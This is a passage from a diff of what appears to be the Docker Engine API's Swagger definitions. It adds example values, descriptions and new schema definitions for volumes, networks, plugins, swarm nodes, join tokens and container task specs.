+              Amount of disk space used by the volume (in bytes). This information
+              is only available for volumes created with the `"local"` volume
+              driver. For volumes created with other volume drivers, this field
+              is set to `-1` ("not available")
             x-nullable: false
           RefCount:
             type: "integer"
             default: -1
-            description: "The number of containers referencing this volume."
+            description: |
+              The number of containers referencing this volume. This field
+              is set to `-1` if the reference-count is not available.
             x-nullable: false
 
     example:
@@ -1045,6 +1385,7 @@ definitions:
         com.example.some-label: "some-value"
         com.example.some-other-label: "some-other-value"
       Scope: "local"
+      CreatedAt: "2016-06-07T20:31:11.853781916Z"
 
   Network:
     type: "object"
@@ -1066,6 +1407,10 @@ definitions:
         $ref: "#/definitions/IPAM"
       Internal:
         type: "boolean"
+      Attachable:
+        type: "boolean"
+      Ingress:
+        type: "boolean"
       Containers:
         type: "object"
         additionalProperties:
@@ -1093,6 +1438,8 @@ definitions:
         Options:
           foo: "bar"
       Internal: false
+      Attachable: false
+      Ingress: false
       Containers:
         19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c:
           Name: "test"
@@ -1131,9 +1478,12 @@ definitions:
           type: "object"
           additionalProperties:
             type: "string"
+
   NetworkContainer:
     type: "object"
     properties:
+      Name:
+        type: "string"
       EndpointID:
         type: "string"
       MacAddress:
@@ -1160,10 +1510,23 @@ definitions:
         type: "string"
       progressDetail:
         $ref: "#/definitions/ProgressDetail"
+      aux:
+        $ref: "#/definitions/ImageID"
+
+  ImageID:
+    type: "object"
+    description: "Image ID or Digest"
+    properties:
+      ID:
+        type: "string"
+    example:
+      ID: "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c"
 
   CreateImageInfo:
     type: "object"
     properties:
+      id:
+        type: "string"
       error:
         type: "string"
       status:
@@ -1184,6 +1547,7 @@ definitions:
         type: "string"
       progressDetail:
         $ref: "#/definitions/ProgressDetail"
+
   ErrorDetail:
     type: "object"
     properties:
@@ -1191,12 +1555,13 @@ definitions:
         type: "integer"
       message:
         type: "string"
+
   ProgressDetail:
     type: "object"
     properties:
-      code:
+      current:
         type: "integer"
-      message:
+      total:
         type: "integer"
 
   ErrorResponse:
@@ -1225,45 +1590,102 @@ definitions:
     description: "Configuration for a network endpoint."
     type: "object"
     properties:
+      # Configurations
       IPAMConfig:
-        description: "IPAM configurations for the endpoint"
-        type: "object"
-        properties:
-          IPv4Address:
-            type: "string"
-          IPv6Address:
-            type: "string"
-          LinkLocalIPs:
-            type: "array"
-            items:
-              type: "string"
+        $ref: "#/definitions/EndpointIPAMConfig"
       Links:
         type: "array"
         items:
           type: "string"
+        example:
+          - "container_1"
+          - "container_2"
       Aliases:
         type: "array"
         items:
           type: "string"
+        example:
+          - "server_x"
+          - "server_y"
+
+      # Operational data
       NetworkID:
+        description: |
+          Unique ID of the network.
         type: "string"
+        example: "08754567f1f40222263eab4102e1c733ae697e8e354aa9cd6e18d7402835292a"
       EndpointID:
+        description: |
+          Unique ID for the service endpoint in a Sandbox.
         type: "string"
+        example: "b88f5b905aabf2893f3cbc4ee42d1ea7980bbc0a92e2c8922b1e1795298afb0b"
       Gateway:
+        description: |
+          Gateway address for this network.
         type: "string"
+        example: "172.17.0.1"
       IPAddress:
+        description: |
+          IPv4 address.
         type: "string"
+        example: "172.17.0.4"
       IPPrefixLen:
+        description: |
+          Mask length of the IPv4 address.
         type: "integer"
+        example: 16
       IPv6Gateway:
+        description: |
+          IPv6 gateway address.
         type: "string"
+        example: "2001:db8:2::100"
       GlobalIPv6Address:
+        description: |
+          Global IPv6 address.
         type: "string"
+        example: "2001:db8::5689"
       GlobalIPv6PrefixLen:
+        description: |
+          Mask length of the global IPv6 address.
         type: "integer"
         format: "int64"
+        example: 64
       MacAddress:
+        description: |
+          MAC address for the endpoint on this network.
+        type: "string"
+        example: "02:42:ac:11:00:04"
+      DriverOpts:
+        description: |
+          DriverOpts is a mapping of driver options and values. These options
+          are passed directly to the driver and are driver specific.
+        type: "object"
+        x-nullable: true
+        additionalProperties:
+          type: "string"
+        example:
+          com.example.some-label: "some-value"
+          com.example.some-other-label: "some-other-value"
+
+  EndpointIPAMConfig:
+    description: |
+      EndpointIPAMConfig represents an endpoint's IPAM configuration.
+    type: "object"
+    x-nullable: true
+    properties:
+      IPv4Address:
+        type: "string"
+        example: "172.20.30.33"
+      IPv6Address:
         type: "string"
+        example: "2001:db8:abcd::3033"
+      LinkLocalIPs:
+        type: "array"
+        items:
+          type: "string"
+        example:
+          - "169.254.34.68"
+          - "fe80::3468"
 
   PluginMount:
     type: "object"
@@ -1273,25 +1695,33 @@ definitions:
       Name:
         type: "string"
         x-nullable: false
+        example: "some-mount"
       Description:
         type: "string"
         x-nullable: false
+        example: "This is a mount that's used by the plugin."
       Settable:
         type: "array"
         items:
           type: "string"
       Source:
         type: "string"
+        example: "/var/lib/docker/plugins/"
       Destination:
         type: "string"
         x-nullable: false
+        example: "/mnt/state"
       Type:
         type: "string"
         x-nullable: false
+        example: "bind"
       Options:
         type: "array"
         items:
           type: "string"
+        example:
+          - "rbind"
+          - "rw"
 
   PluginDevice:
     type: "object"
@@ -1310,6 +1740,7 @@ definitions:
           type: "string"
       Path:
         type: "string"
+        example: "/dev/fuse"
 
   PluginEnv:
     type: "object"
@@ -1351,13 +1782,16 @@ definitions:
     properties:
       Id:
         type: "string"
+        example: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078"
       Name:
         type: "string"
         x-nullable: false
+        example: "tiborvass/sample-volume-plugin"
       Enabled:
-        description: "True when the plugin is running. False when the plugin is not running, only installed."
+        description: "True if the plugin is running. False if the plugin is not running, only installed."
         type: "boolean"
         x-nullable: false
+        example: true
       Settings:
         description: "Settings that can be modified by users."
         type: "object"
@@ -1372,6 +1806,8 @@ definitions:
             type: "array"
             items:
               type: "string"
+            example:
+              - "DEBUG=0"
           Args:
             type: "array"
             items:
@@ -1384,6 +1820,7 @@ definitions:
         description: "plugin remote reference used to push/pull the plugin"
         type: "string"
         x-nullable: false
+        example: "localhost:5000/tiborvass/sample-volume-plugin:latest"
       Config:
         description: "The config of a plugin."
         type: "object"
@@ -1396,17 +1833,26 @@ definitions:
           - WorkDir
           - Network
           - Linux
+          - PidHost
           - PropagatedMount
+          - IpcHost
           - Mounts
           - Env
           - Args
         properties:
+          DockerVersion:
+            description: "Docker Version used to create the plugin"
+            type: "string"
+            x-nullable: false
+            example: "17.06.0-ce"
           Description:
             type: "string"
             x-nullable: false
+            example: "A sample volume plugin for Docker"
           Documentation:
             type: "string"
             x-nullable: false
+            example: "https://docs.docker.com/engine/extend/plugins/"
           Interface:
             description: "The interface between Docker and the plugin"
             x-nullable: false
@@ -1417,16 +1863,30 @@ definitions:
                 type: "array"
                 items:
                   $ref: "#/definitions/PluginInterfaceType"
+                example:
+                  - "docker.volumedriver/1.0"
               Socket:
                 type: "string"
                 x-nullable: false
+                example: "plugins.sock"
+              ProtocolScheme:
+                type: "string"
+                example: "some.protocol/v1.0"
+                description: "Protocol to use for clients connecting to the plugin."
+                enum:
+                  - ""
+                  - "moby.plugins.http/v1"
           Entrypoint:
             type: "array"
             items:
               type: "string"
+            example:
+              - "/usr/bin/sample-volume-plugin"
+              - "/data"
           WorkDir:
             type: "string"
             x-nullable: false
+            example: "/bin/"
           User:
             type: "object"
             x-nullable: false
@@ -1434,9 +1894,11 @@ definitions:
               UID:
                 type: "integer"
                 format: "uint32"
+                example: 1000
               GID:
                 type: "integer"
                 format: "uint32"
+                example: 1000
           Network:
             type: "object"
             x-nullable: false
@@ -1445,6 +1907,7 @@ definitions:
               Type:
                 x-nullable: false
                 type: "string"
+                example: "host"
           Linux:
             type: "object"
             x-nullable: false
@@ -1454,9 +1917,13 @@ definitions:
                 type: "array"
                 items:
                   type: "string"
+                example:
+                  - "CAP_SYS_ADMIN"
+                  - "CAP_SYSLOG"
               AllowAllDevices:
                 type: "boolean"
                 x-nullable: false
+                example: false
               Devices:
                 type: "array"
                 items:
@@ -1464,6 +1931,15 @@ definitions:
           PropagatedMount:
             type: "string"
             x-nullable: false
+            example: "/mnt/volumes"
+          IpcHost:
+            type: "boolean"
+            x-nullable: false
+            example: false
+          PidHost:
+            type: "boolean"
+            x-nullable: false
+            example: false
           Mounts:
             type: "array"
             items:
@@ -1472,6 +1948,11 @@ definitions:
             type: "array"
             items:
               $ref: "#/definitions/PluginEnv"
+            example:
+              - Name: "DEBUG"
+                Description: "If set, prints debug messages"
+                Settable: null
+                Value: "0"
           Args:
             type: "object"
             x-nullable: false
@@ -1480,9 +1961,11 @@ definitions:
               Name:
                 x-nullable: false
                 type: "string"
+                example: "args"
               Description:
                 x-nullable: false
                 type: "string"
+                example: "command line arguments"
               Settable:
                 type: "array"
                 items:
@@ -1496,50 +1979,30 @@ definitions:
             properties:
               type:
                 type: "string"
+                example: "layers"
               diff_ids:
                 type: "array"
                 items:
                   type: "string"
-    example:
-      Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078"
-      Name: "tiborvass/sample-volume-plugin"
-      Tag: "latest"
-      Active: true
-      Settings:
-        Env:
-          - "DEBUG=0"
-        Args: null
-        Devices: null
-      Config:
-        Description: "A sample volume plugin for Docker"
-        Documentation: "https://docs.docker.com/engine/extend/plugins/"
-        Interface:
-          Types:
-            - "docker.volumedriver/1.0"
-          Socket: "plugins.sock"
-        Entrypoint:
-          - "/usr/bin/sample-volume-plugin"
-          - "/data"
-        WorkDir: ""
-        User: {}
-        Network:
-          Type: ""
-        Linux:
-          Capabilities: null
-          AllowAllDevices: false
-          Devices: null
-        Mounts: null
-        PropagatedMount: "/data"
-        Env:
-          - Name: "DEBUG"
-            Description: "If set, prints debug messages"
-            Settable: null
-            Value: "0"
-        Args:
-          Name: "args"
-          Description: "command line arguments"
-          Settable: null
-          Value: []
+                example:
+                  - "sha256:675532206fbf3030b8458f88d6e26d4eb1577688a25efec97154c94e8b6b4887"
+                  - "sha256:e216a057b1cb1efc11f8a268f37ef62083e70b1b38323ba252e25ac88904a7e8"
+
+  ObjectVersion:
+    description: |
+      The version number of the object such as node, service, etc. This is needed to avoid conflicting writes.
+      The client must send the version number along with the modified specification when updating these objects.
+      This approach ensures safe concurrency and determinism in that the change on the object
+      may not be applied if the version number has changed from the last read. In other words,
+      if two update requests specify the same base version, only one of the requests can succeed.
+      As a result, two separate update requests that happen at the same time will not
+      unintentionally overwrite each other.
+    type: "object"
+    properties:
+      Index:
+        type: "integer"
+        format: "uint64"
+        example: 373531
 
   NodeSpec:
     type: "object"
@@ -1547,6 +2010,7 @@ definitions:
       Name:
         description: "Name for the node."
         type: "string"
+        example: "my-node"
       Labels:
         description: "User-defined key/value metadata."
         type: "object"
@@ -1558,6 +2022,7 @@ definitions:
         enum:
           - "worker"
           - "manager"
+        example: "manager"
       Availability:
         description: "Availability of the node."
         type: "string"
@@ -1565,110 +2030,225 @@ definitions:
           - "active"
           - "pause"
           - "drain"
+        example: "active"
     example:
       Availability: "active"
       Name: "node-name"
       Role: "manager"
       Labels:
         foo: "bar"
+
   Node:
     type: "object"
     properties:
       ID:
         type: "string"
+        example: "24ifsmvkjbyhk"
       Version:
-        type: "object"
-        properties:
-          Index:
-            type: "integer"
-            format: "int64"
+        $ref: "#/definitions/ObjectVersion"
       CreatedAt:
+        description: |
+          Date and time at which the node was added to the swarm in
+          [RFC 3339](https://www.ietf.org/rfc/rfc3339.txt) format with nano-seconds.
         type: "string"
         format: "dateTime"
+        example: "2016-08-18T10:44:24.496525531Z"
       UpdatedAt:
+        description: |
+          Date and time at which the node was last updated in
+          [RFC 3339](https://www.ietf.org/rfc/rfc3339.txt) format with nano-seconds.
         type: "string"
         format: "dateTime"
+        example: "2017-08-09T07:09:37.632105588Z"
       Spec:
         $ref: "#/definitions/NodeSpec"
       Description:
-        type: "object"
-        properties:
-          Hostname:
-            type: "string"
-          Platform:
-            type: "object"
-            properties:
-              Architecture:
-                type: "string"
-              OS:
-                type: "string"
-          Resources:
-            type: "object"
-            properties:
-              NanoCPUs:
-                type: "integer"
-                format: "int64"
-              MemoryBytes:
-                type: "integer"
-                format: "int64"
-          Engine:
-            type: "object"
-            properties:
-              EngineVersion:
-                type: "string"
-              Labels:
-                type: "object"
-                additionalProperties:
-                  type: "string"
-              Plugins:
-                type: "array"
-                items:
-                  type: "object"
-                  properties:
-                    Type:
-                      type: "string"
-                    Name:
-                      type: "string"
-    example:
-      ID: "24ifsmvkjbyhk"
-      Version:
-        Index: 8
-      CreatedAt: "2016-06-07T20:31:11.853781916Z"
-      UpdatedAt: "2016-06-07T20:31:11.999868824Z"
-      Spec:
-        Name: "my-node"
-        Role: "manager"
-        Availability: "active"
-        Labels:
-          foo: "bar"
-      Description:
-        Hostname: "bf3067039e47"
-        Platform:
-          Architecture: "x86_64"
-          OS: "linux"
-        Resources:
-          NanoCPUs: 4000000000
-          MemoryBytes: 8272408576
-        Engine:
-          EngineVersion: "1.13.0"
-          Labels:
-            foo: "bar"
-          Plugins:
-            - Type: "Volume"
-              Name: "local"
-            - Type: "Network"
-              Name: "bridge"
-            - Type: "Network"
-              Name: "null"
-            - Type: "Network"
-              Name: "overlay"
+        $ref: "#/definitions/NodeDescription"
       Status:
-        State: "ready"
-        Addr: "172.17.0.2"
+        $ref: "#/definitions/NodeStatus"
       ManagerStatus:
-        Leader: true
-        Reachability: "reachable"
-        Addr: "172.17.0.2:2377"
+        $ref: "#/definitions/ManagerStatus"
+
+  NodeDescription:
+    description: |
+      NodeDescription encapsulates the properties of the Node as reported by the
+      agent.
+    type: "object"
+    properties:
+      Hostname:
+        type: "string"
+        example: "bf3067039e47"
+      Platform:
+        $ref: "#/definitions/Platform"
+      Resources:
+        $ref: "#/definitions/ResourceObject"
+      Engine:
+        $ref: "#/definitions/EngineDescription"
+      TLSInfo:
+        $ref: "#/definitions/TLSInfo"
+
+  Platform:
+    description: |
+      Platform represents the platform (Arch/OS).
+    type: "object"
+    properties:
+      Architecture:
+        description: |
+          Architecture represents the hardware architecture (for example,
+          `x86_64`).
+        type: "string"
+        example: "x86_64"
+      OS:
+        description: |
+          OS represents the Operating System (for example, `linux` or `windows`).
+        type: "string"
+        example: "linux"
+
+  EngineDescription:
+    description: "EngineDescription provides information about an engine."
+    type: "object"
+    properties:
+      EngineVersion:
+        type: "string"
+        example: "17.06.0"
+      Labels:
+        type: "object"
+        additionalProperties:
+          type: "string"
+        example:
+          foo: "bar"
+      Plugins:
+        type: "array"
+        items:
+          type: "object"
+          properties:
+            Type:
+              type: "string"
+            Name:
+              type: "string"
+        example:
+          - Type: "Log"
+            Name: "awslogs"
+          - Type: "Log"
+            Name: "fluentd"
+          - Type: "Log"
+            Name: "gcplogs"
+          - Type: "Log"
+            Name: "gelf"
+          - Type: "Log"
+            Name: "journald"
+          - Type: "Log"
+            Name: "json-file"
+          - Type: "Log"
+            Name: "logentries"
+          - Type: "Log"
+            Name: "splunk"
+          - Type: "Log"
+            Name: "syslog"
+          - Type: "Network"
+            Name: "bridge"
+          - Type: "Network"
+            Name: "host"
+          - Type: "Network"
+            Name: "ipvlan"
+          - Type: "Network"
+            Name: "macvlan"
+          - Type: "Network"
+            Name: "null"
+          - Type: "Network"
+            Name: "overlay"
+          - Type: "Volume"
+            Name: "local"
+          - Type: "Volume"
+            Name: "localhost:5000/vieux/sshfs:latest"
+          - Type: "Volume"
+            Name: "vieux/sshfs:latest"
+
+  TLSInfo:
+    description: "Information about the issuer of leaf TLS certificates and the trusted root CA certificate"
+    type: "object"
+    properties:
+      TrustRoot:
+        description: "The root CA certificate(s) that are used to validate leaf TLS certificates"
+        type: "string"
+      CertIssuerSubject:
+        description: "The base64-url-safe-encoded raw subject bytes of the issuer"
+        type: "string"
+      CertIssuerPublicKey:
+        description: "The base64-url-safe-encoded raw public key bytes of the issuer"
+        type: "string"
+    example:
+      TrustRoot: |
+        -----BEGIN CERTIFICATE-----
+        MIIBajCCARCgAwIBAgIUbYqrLSOSQHoxD8CwG6Bi2PJi9c8wCgYIKoZIzj0EAwIw
+        EzERMA8GA1UEAxMIc3dhcm0tY2EwHhcNMTcwNDI0MjE0MzAwWhcNMzcwNDE5MjE0
+        MzAwWjATMREwDwYDVQQDEwhzd2FybS1jYTBZMBMGByqGSM49AgEGCCqGSM49AwEH
+        A0IABJk/VyMPYdaqDXJb/VXh5n/1Yuv7iNrxV3Qb3l06XD46seovcDWs3IZNV1lf
+        3Skyr0ofcchipoiHkXBODojJydSjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMB
+        Af8EBTADAQH/MB0GA1UdDgQWBBRUXxuRcnFjDfR/RIAUQab8ZV/n4jAKBggqhkjO
+        PQQDAgNIADBFAiAy+JTe6Uc3KyLCMiqGl2GyWGQqQDEcO3/YG36x7om65AIhAJvz
+        pxv6zFeVEkAEEkqIYi0omA9+CjanB/6Bz4n1uw8H
+        -----END CERTIFICATE-----
+      CertIssuerSubject: "MBMxETAPBgNVBAMTCHN3YXJtLWNh"
+      CertIssuerPublicKey: "MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEmT9XIw9h1qoNclv9VeHmf/Vi6/uI2vFXdBveXTpcPjqx6i9wNazchk1XWV/dKTKvSh9xyGKmiIeRcE4OiMnJ1A=="
+
+  NodeStatus:
+    description: |
+      NodeStatus represents the status of a node.
+
+      It provides the current status of the node, as seen by the manager.
+    type: "object"
+    properties:
+      State:
+        $ref: "#/definitions/NodeState"
+      Message:
+        type: "string"
+        example: ""
+      Addr:
+        description: "IP address of the node."
+        type: "string"
+        example: "172.17.0.2"
+
+  NodeState:
+    description: "NodeState represents the state of a node."
+    type: "string"
+    enum:
+      - "unknown"
+      - "down"
+      - "ready"
+      - "disconnected"
+    example: "ready"
+
+  ManagerStatus:
+    description: |
+      ManagerStatus represents the status of a manager.
+
+      It provides the current status of a node's manager component, if the node
+      is a manager.
+    x-nullable: true
+    type: "object"
+    properties:
+      Leader:
+        type: "boolean"
+        default: false
+        example: true
+      Reachability:
+        $ref: "#/definitions/Reachability"
+      Addr:
+        description: |
+          The IP address and port at which the manager is reachable.
+        type: "string"
+        example: "10.0.0.46:2377"
+
+  Reachability:
+    description: "Reachability represents the reachability of a node."
+    type: "string"
+    enum:
+      - "unknown"
+      - "unreachable"
+      - "reachable"
+    example: "reachable"
+
   SwarmSpec:
     description: "User modifiable swarm configuration."
     type: "object"
@@ -1676,19 +2256,25 @@ definitions:
       Name:
         description: "Name of the swarm."
         type: "string"
+        example: "default"
       Labels:
         description: "User-defined key/value metadata."
         type: "object"
         additionalProperties:
           type: "string"
+        example:
+          com.example.corp.type: "production"
+          com.example.corp.department: "engineering"
       Orchestration:
         description: "Orchestration configuration."
         type: "object"
+        x-nullable: true
         properties:
           TaskHistoryRetentionLimit:
             description: "The number of historic tasks to keep per instance or node. If negative, never remove completed or failed tasks."
             type: "integer"
             format: "int64"
+            example: 10
       Raft:
         description: "Raft configuration."
         type: "object"
@@ -1696,43 +2282,51 @@ definitions:
           SnapshotInterval:
             description: "The number of log entries between snapshots."
             type: "integer"
-            format: "int64"
+            format: "uint64"
+            example: 10000
           KeepOldSnapshots:
             description: "The number of snapshots to keep beyond the current snapshot."
             type: "integer"
-            format: "int64"
+            format: "uint64"
           LogEntriesForSlowFollowers:
             description: "The number of log entries to keep around to sync up slow followers after a snapshot is created."
             type: "integer"
-            format: "int64"
+            format: "uint64"
+            example: 500
           ElectionTick:
             description: |
               The number of ticks that a follower will wait for a message from the leader before becoming a candidate and starting an election. `ElectionTick` must be greater than `HeartbeatTick`.
 
               A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed.
             type: "integer"
+            example: 3
           HeartbeatTick:
             description: |
               The number of ticks between heartbeats. Every HeartbeatTick ticks, the leader will send a heartbeat to the followers.
 
               A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed.
             type: "integer"
+            example: 1
       Dispatcher:
         description: "Dispatcher configuration."
         type: "object"
+        x-nullable: true
         properties:
           HeartbeatPeriod:
             description: "The delay for an agent to send a heartbeat to the dispatcher."
             type: "integer"
             format: "int64"
+            example: 5000000000
       CAConfig:
         description: "CA configuration."
         type: "object"
+        x-nullable: true
         properties:
           NodeCertExpiry:
             description: "The duration node certificates are issued for."
             type: "integer"
             format: "int64"
+            example: 7776000000000000
           ExternalCAs:
             description: "Configuration for forwarding signing requests to an external certificate authority."
             type: "array"
@@ -1753,6 +2347,19 @@ definitions:
                   type: "object"
                   additionalProperties:
                     type: "string"
+                CACert:
+                  description: "The root CA certificate (in PEM format) this external CA uses to issue TLS certificates (assumed to be to the current swarm root CA certificate if not provided)."
+                  type: "string"
+          SigningCACert:
+            description: "The desired signing CA certificate for all swarm node TLS leaf certificates, in PEM format."
+            type: "string"
+          SigningCAKey:
+            description: "The desired signing CA key for all swarm node TLS leaf certificates, in PEM format."
+            type: "string"
+          ForceRotate:
+            description: "An integer whose purpose is to force swarm to generate a new signing CA certificate and key, if none have been specified in `SigningCACert` and `SigningCAKey`"
+            format: "uint64"
+            type: "integer"
       EncryptionConfig:
         description: "Parameters related to encryption-at-rest."
         type: "object"
@@ -1760,73 +2367,158 @@ definitions:
           AutoLockManagers:
             description: "If set, generate a key and use it to lock data stored on the managers."
             type: "boolean"
+            example: false
       TaskDefaults:
         description: "Defaults for creating tasks in this cluster."
         type: "object"
         properties:
           LogDriver:
             description: |
-              The log driver to use for tasks created in the orchestrator if unspecified by a service.
+              The log driver to use for tasks created in the orchestrator if
+              unspecified by a service.
 
-              Updating this value will only have an affect on new tasks. Old tasks will continue use their previously configured log driver until recreated.
+              Updating this value only affects new tasks. Existing tasks continue
+              to use their previously configured log driver until recreated.
             type: "object"
             properties:
               Name:
+                description: |
+                  The log driver to use as a default for new tasks.
                 type: "string"
+                example: "json-file"
               Options:
+                description: |
+                  Driver-specific options for the selectd log driver, specified
+                  as key/value pairs.
                 type: "object"
                 additionalProperties:
                   type: "string"
-    example:
-      Name: "default"
-      Orchestration:
-        TaskHistoryRetentionLimit: 10
-      Raft:
-        SnapshotInterval: 10000
-        LogEntriesForSlowFollowers: 500
-        HeartbeatTick: 1
-        ElectionTick: 3
-      Dispatcher:
-        HeartbeatPeriod: 5000000000
-      CAConfig:
-        NodeCertExpiry: 7776000000000000
-      JoinTokens:
-        Worker: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx"
-        Manager: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2"
-      EncryptionConfig:
-        AutoLockManagers: false
+                example:
+                  "max-file": "10"
+                  "max-size": "100m"
+
   # The Swarm information for `GET /info`. It is the same as `GET /swarm`, but
   # without `JoinTokens`.
   ClusterInfo:
+    description: |
+      ClusterInfo represents information about the swarm as is returned by the
+      "/info" endpoint. Join-tokens are not included.
+    x-nullable: true
     type: "object"
     properties:
       ID:
         description: "The ID of the swarm."
         type: "string"
+        example: "abajmipo7b4xz5ip2nrla6b11"
       Version:
-        type: "object"
-        properties:
-          Index:
-            type: "integer"
-            format: "int64"
+        $ref: "#/definitions/ObjectVersion"
       CreatedAt:
+        description: |
+          Date and time at which the swarm was initialised in
+          [RFC 3339](https://www.ietf.org/rfc/rfc3339.txt) format with nano-seconds.
         type: "string"
         format: "dateTime"
+        example: "2016-08-18T10:44:24.496525531Z"
       UpdatedAt:
+        description: |
+          Date and time at which the swarm was last updated in
+          [RFC 3339](https://www.ietf.org/rfc/rfc3339.txt) format with nano-seconds.
         type: "string"
         format: "dateTime"
+        example: "2017-08-09T07:09:37.632105588Z"
       Spec:
         $ref: "#/definitions/SwarmSpec"
+      TLSInfo:
+        $ref: "#/definitions/TLSInfo"
+      RootRotationInProgress:
+        description: "Whether there is currently a root CA rotation in progress for the swarm"
+        type: "boolean"
+        example: false
+
+  JoinTokens:
+    description: |
+      JoinTokens contains the tokens workers and managers need to join the swarm.
+    type: "object"
+    properties:
+      Worker:
+        description: |
+          The token workers can use to join the swarm.
+        type: "string"
+        example: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx"
+      Manager:
+        description: |
+          The token managers can use to join the swarm.
+        type: "string"
+        example: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2"
+
+  Swarm:
+    type: "object"
+    allOf:
+      - $ref: "#/definitions/ClusterInfo"
+      - type: "object"
+        properties:
+          JoinTokens:
+            $ref: "#/definitions/JoinTokens"
+
   TaskSpec:
     description: "User modifiable task configuration."
     type: "object"
     properties:
+      PluginSpec:
+        type: "object"
+        description: |
+          Plugin spec for the service.  *(Experimental release only.)*
+
+          <p><br /></p>
+
+          > **Note**: ContainerSpec, NetworkAttachmentSpec, and PluginSpec are
+          > mutually exclusive. PluginSpec is only used when the Runtime field
+          > is set to `plugin`. NetworkAttachmentSpec is used when the Runtime
+          > field is set to `attachment`.
+        properties:
+          Name:
+            description: "The name or 'alias' to use for the plugin."
+            type: "string"
+          Remote:
+            description: "The plugin image reference to use."
+            type: "string"
+          Disabled:
+            description: "Disable the plugin once scheduled."
+            type: "boolean"
+          PluginPrivilege:
+            type: "array"
+            items:
+              description: "Describes a permission accepted by the user upon installing the plugin."
+              type: "object"
+              properties:
+                Name:
+                  type: "string"
+                Description:
+                  type: "string"
+                Value:
+                  type: "array"
+                  items:
+                    type: "string"
       ContainerSpec:
         type: "object"
+        description: |
+          Container spec for the service.
+
+          <p><br /></p>
+
+          > **Note**: ContainerSpec, NetworkAttachmentSpec, and PluginSpec are
+          > mutually exclusive. PluginSpec is only used when the Runtime field
+          > is set to `plugin`. NetworkAttachmentSpec is used when the Runtime
+          > field is set to `attachment`.
         properties:
           Image:
-            description: "The image name to use for the container."
+            description: "The image name to use for the container"
             type: "string"
+          Labels:
+            description: "User-defined key/value data."
+            type: "object"
+            additionalProperties:
+              type: "string"
           Command:
             description: "The command to be run in the image."
             type: "array"
@@ -1837,6 +2529,9 @@ definitions:
             type: "array"
             items:
               type: "string"
+          Hostname:
+            description: "The hostname to use for the container, as a valid RFC 1123 hostname."
+            type: "string"
           Env:
             description: "A list of environment variables in the form `VAR=value`."
             type: "array"
@@ -1848,23 +2543,96 @@ definitions:
           User:
             description: "The user inside the container."
             type: "string"
-          Labels:
-            description: "User-defined key/value data."
-            type: "object"
-            additionalProperties:
+          Groups:
+            type: "array"
+            description: "A list of additional groups that the container process will run as."
+            items:
               type: "string"
+          Privileges:
+            type: "object"
+            description: "Security options for the container"
+            properties:
+              CredentialSpec:
+                type: "object"
+                description: "CredentialSpec for managed service account (Windows only)"
+                properties:
+                  File:
+                    type: "string"
+                    description: |
+                      Load credential spec from this file. The file is read by the daemon, and must be present in the
+                      `CredentialSpecs` subdirectory in the docker data directory, which defaults to
+                      `C:\ProgramData\Docker\` on Windows.
+
+                      For example, specifying `spec.json` loads `C:\ProgramData\Docker\CredentialSpecs\spec.json`.
+
+                      <p><br /></p>
+
+                      > **Note**: `CredentialSpec.File` and `CredentialSpec.Registry` are mutually exclusive.
+                  Registry:
+                    type: "string"
+                    description: |
+                      Load credential spec from this value in the Windows registry. The specified registry value must be
+                      located in:
+
+                      `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs`
+
+                      <p><br /></p>
+
+
+                      > **Note**: `CredentialSpec.File` and `CredentialSpec.Registry` are mutually exclusive.
+              SELinuxContext:
+                type: "object"
+                description: "SELinux labels of the container"
+                properties:
+                  Disable:
+                    type: "boolean"
+                    description: "Disable SELinux"
+                  User:
+                    type: "string"
+                    description: "SELinux user label"
+                  Role:
+                    type: "string"
+                    description: "SELinux role label"
+                  Type:
+                    type: "string"
+                    description: "SELinux type label"
+                  Level:
+                    type: "string"
+                    description: "SELinux level label"
           TTY:
             description: "Whether a pseudo-TTY should be allocated."
             type: "boolean"
+          OpenStdin:
+            description: "Open `stdin`"
+            type: "boolean"
+          ReadOnly:
+            description: "Mount the container's root filesystem as read only."
+            type: "boolean"
           Mounts:
             description: "Specification for mounts to be added to containers created as part of the service."
             type: "array"
             items:
               $ref: "#/definitions/Mount"
+          StopSignal:
+            description: "Signal to stop the container."
+            type: "string"
           StopGracePeriod:
             description: "Amount of time to wait for the container to terminate before forcefully killing it."
             type: "integer"
             format: "int64"
+          HealthCheck:
+            $ref: "#/definitions/HealthConfig"
+          Hosts:
+            type: "array"
+            description: |
+              A list of hostname/IP mappings to add to the container's `hosts`
+              file. The format of extra hosts is specified in the
+              [hosts(5)](http://man7.org/linux/man-pages/man5/hosts.5.html)
+              man page:
+
+                  IP_address canonical_hostname [aliases...]
+            items:
+              type: "string"
           DNSConfig:
             description: "Specification for DNS related configurations in resolver configuration file (`resolv.conf`)."
             type: "object"
@@ -1884,33 +2652,105 @@ definitions:
                 type: "array"
                 items:
                   type: "string"
+          Secrets:
+            description: "Secrets contains references to zero or more secrets that will be exposed to the service."
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                File:
+                  description: "File represents a specific target that is backed by a file."
+                  type: "object"
+                  properties:
+                    Name:
+                      description: "Name represents the final filename in the filesystem."
+                      type: "string"
+                    UID:
+                      description: "UID represents the file UID."
+                      type: "string"
+                    GID:
+                      description: "GID represents the file GID."
+                      type: "string"
+                    Mode:
+                      description: "Mode represents the FileMode of the file."
+                      type: "integer"
+                      format: "uint32"
+                SecretID:
+                  description: "SecretID represents the ID of the specific secret that we're referencing."
+                  type: "string"
+                SecretName:
+                  description: |
